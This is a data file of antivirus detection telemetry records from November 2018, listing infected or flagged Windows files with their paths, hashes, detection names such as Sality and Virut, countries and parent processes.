  Row(detection=Row(filename='savepass 1.1-bho64.dll', filepath='\\\\?\\C:\\Program Files (x86)\\SavePass 1.1\\SavePass 1.1-bho64.dll', filesize=940000, name='ADWARE/CrossRider.Gen.#M300.#R5892'), hash='15ee2676c95b45800892ec5873aee229893ff4d19cfd133f2e8e02683b37e2c7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T15:02:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002953-87a9438f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9026954\\AVSCAN-20181102-002813-7A415C46\\AVSCAN-20181102-002953-87A9438F', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:29:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='11d5167e9542b2084638bfee2e987fe11f2201a4f746161fd3879aed097607ab', metadata=Row(cmdline=None, country='GA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T03:56:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='278791448a467da958765da3f7070c9cd2621e5486af3a6370101f0ec704af94', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-8\\278791448A467DA958765DA3F7070C9CD2621E5486AF3A6370101F0EC704AF94', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='278791448a467da958765da3f7070c9cd2621e5486af3a6370101f0ec704af94', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:00:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='intelwidivad32.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Video_Intel_14034\\drp\\FORCED\\NTx86\\HD5000_10.18.10.3496\\IntelWiDiVAD32.exe', filesize=2220000, name='W32/Sality.AT.#M1.#R1'), hash='48cd281a1363175dae2484f5842b5fd47e7b48e61da296b5bd3ef9513d3e5f10', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:33:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b438e', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b438e', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:55:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.447\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.447\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:34:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir000', filepath='\\\\?\\C:\\Applications\\Service.VIR000', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\0ja5vnqizga\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1539843432.5bc825683a740', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AZ\\499287.exe', parentsize=671232, timestamp='2018-11-01T15:50:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered facod', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered facod', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='dc26e9b5291e93bbb8f1e419cf449550fd705fd81d2a415254b31a9604c2a82e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:16:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rodriguez.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\TESI MASTER\\RODRIGUEZ.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information                                                                                           .exe', filepath='F:\\System Volume Information                                                                                           .exe', filesize=0, name='WORM/Autorun.hfp.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T11:15:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fgktgqhk.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\FGkTGQHK.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scan.exe', filepath='F:\\\xa0\\scan\\scan.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\ANCIENPC\\C\\Program Files\\File Recovery\\undelete360\\unins000.exe', filesize=784000, name='W32/Sality.AT.#M1.#R1'), hash='d5ee8229a137c303b23ba143a490bb48d12f62f7f5b01c6ef269555c75f5e2c6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:zQpazfJNQEuD1LcM.1', country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T08:02:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e454e3fcb862da4067e6824294020e394d9f6bd7a657360fa04dd1930640c36c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\E454E3FCB862DA4067E6824294020E394D9F6BD7A657360FA04DD1930640C36C', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='e454e3fcb862da4067e6824294020e394d9f6bd7a657360fa04dd1930640c36c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:17:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\yw15pqe22be\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540457318.5bd1836688dae', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Capture\\169492924.exe', parentsize=670720, timestamp='2018-11-01T02:22:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095536-7ecd80de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095536-7ECD80DE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách tập huấn xlhc.exe', filepath='H:\\\xa0\\danh sách tập huấn xlhc.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='be2973225aeea112324261ea47eefecffcf932402940f8c860213cb0c52e6569', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T01:45:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145820-c883f83d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dce9b310\\AVSCAN-20181101-145707-C070BBF9\\AVSCAN-20181101-145820-C883F83D', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\lp4thy10urz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541067481.5bdad2d97fda4', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Free\\840783366.exe', parentsize=671232, timestamp='2018-11-01T10:19:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iostream.exe', filepath='C:\\ProgramData\\Iostream.exe', filesize=1792000, name='HEUR/AGEN.1011967.#M1.#R1'), hash='d2e26dc915778acee9c3820217fb869a5709ba58bd42a9b56ebcd0fecb44ff0c', metadata=Row(cmdline='{DED7F7AE-15A5-49F2-98BE-00C47194E8E6} S-1-5-21-2608386558-3963690224-2861772362-1000:user-PC\\\\\\\\user:Interactive:[1]', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-01T07:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165307-0a7ed7a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163706-4CB2CFCA\\AVSCAN-20181101-165307-0A7ED7A4', filesize=192000, name='Adware/Elex.umebz.#M1.#R1'), hash='bf33a2fa1417e9e761302b0d0f29c355a3841a18117dadb6085389763bbf5f4d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:53:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cd4e8fc57282bf8fec5014d2816c12a060e4d6959852d3c0449b84d4be2de9bc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\CD4E8FC57282BF8FEC5014D2816C12A060E4D6959852D3C0449B84D4BE2DE9BC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cd4e8fc57282bf8fec5014d2816c12a060e4d6959852d3c0449b84d4be2de9bc', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:10:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094855-31fe93de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094855-31FE93DE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:49:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T05:18:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e2efb922dde4c52bb16c8068257aac7cd3b3926c29bdf5819e886386e4753e58', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\E2EFB922DDE4C52BB16C8068257AAC7CD3B3926C29BDF5819E886386E4753E58', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e2efb922dde4c52bb16c8068257aac7cd3b3926c29bdf5819e886386e4753e58', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:12:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='organizzazione aziendale.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ORGANIZZAZIONE AZIENDALE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.vir', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2649704\\mnnstubsetup.vir', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T02:37:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hpqdirec.exe', filepath='C:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\Hpqdirec.exe', filesize=960000, name='W32/Sality.AT.#M1.#R1'), hash='4e48d53297be073b4e003c906207e69ded2a507cfc02a83b5903027a1c207af0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T23:49:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:36:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\Program Files\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:47:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='prounstl.exe', filepath='E:\\Softwares\\Gagibite 61M\\Network\\Intel\\PROXGB\\Win32\\NDIS63\\PROUnstl.exe', filesize=368000, name='W32/Sality.AT.#M1.#R1'), hash='18d48af599c5a4f3ca2f3e70974fa1e8273d34815a4483a113040aa1947c08b0', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SCIENTER\\RestManage\\RestManage.exe', parentsize=3473408, timestamp='2018-11-04T02:58:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212137-2b419757', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61e0b237\\AVSCAN-20181104-211730-0E7E2092\\AVSCAN-20181104-212137-2B419757', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:21:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243d6', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243d6', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:48:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180615-ef420673', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e4e1472\\AVSCAN-20181104-180534-EC620430\\AVSCAN-20181104-180615-EF420673', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='1dfb9b273523734a1eb28d1def40702e9e60c6cddea1a9563407865837aa4c23', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:06:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0347217.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0347217.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:30:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211003-9d0c4d63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-211003-9D0C4D63', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:10:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130906-0d8d8e0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130906-0D8D8E0B', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:09:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195817-0f586ef8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6048dd9\\AVSCAN-20181104-195732-0A9CA371\\AVSCAN-20181104-195817-0F586EF8', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T21:19:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T04:55:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\AVIRA\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T17:19:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-235211-17c323df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b76dc2d6\\AVSCAN-20181104-235158-15152BD0\\AVSCAN-20181104-235211-17C323DF', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T22:27:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-101203-c3142697', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d54d7a2\\AVSCAN-20181104-101109-BA925492\\AVSCAN-20181104-101203-C3142697', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:12:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-51-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T15:01:59Z'), dt=datetime.date(2018, 11, 4)),
